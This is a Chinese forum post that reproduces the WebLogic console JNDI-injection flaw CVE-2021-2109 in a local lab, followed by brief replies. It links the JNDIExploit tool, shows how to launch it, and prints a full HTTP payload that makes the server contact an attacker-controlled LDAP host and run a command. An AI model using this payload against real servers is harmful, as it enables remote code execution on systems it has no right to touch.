WebLogic后台命令执行漏洞(CVE-2021-2109)

查看 65|回复 5
作者:zaqw0001   
0x00 软件介绍
Oracle WebLogic:一款流行的JAVA应用服务器
0x01 复现环境

复现环境:本地搭建的环境(win10 1909)
复现版本:WebLogic v12.2.1.4.0
环境搭建:参考https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA中的环境搭建部分
0x02 利用条件

需要登陆WebLogic控制台
0x03 影响版本
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
0x04 漏洞复现
攻击环境:kali x64
下载JNDIExploit:https://github.com/feihong-cs/JNDIExploit/releases/download/v.1.11/JNDIExploit.v1.11.zip
启动JNDIExploit:
java -jar ./JNDIExploit-v1.11.jar -i 192.168.1.5#其中192.168.1.5为本机IP登录WebLogic控制台
刷新WebLogic控制台,burp抓包,替换为如下payload
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;5:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1Host: 192.168.1.7:7001User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflatecmd:whoamiReferer: http://192.168.1.7:7001/console/login/LoginForm.jspConnection: closeCookie: ADMINCONSOLESESSION=-XjUGJChfEBvqXqZBo748vnBGr895IIDGF5cmnoR9HkR_uY8Hrfd!-1181708775Upgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache
如下图,可以看到成功执行命令whoami(此漏洞可配合Weblogic未授权访问漏洞(CVE-2020-14882)使用)

环境, 漏洞

yirennb   
看看学习学习
whoami233   
图是外链GITHUB的吧,打不开
gueenwang   
非常可以 非常可以
happyboy1   
前来学习
zaqw0001
OP
  

whoami233 发表于 2023-4-25 13:27
图是外链GITHUB的吧,打不开

对  忘了放到本地了  下次修改下
您需要登录后才可以回帖 登录 | 立即注册

返回顶部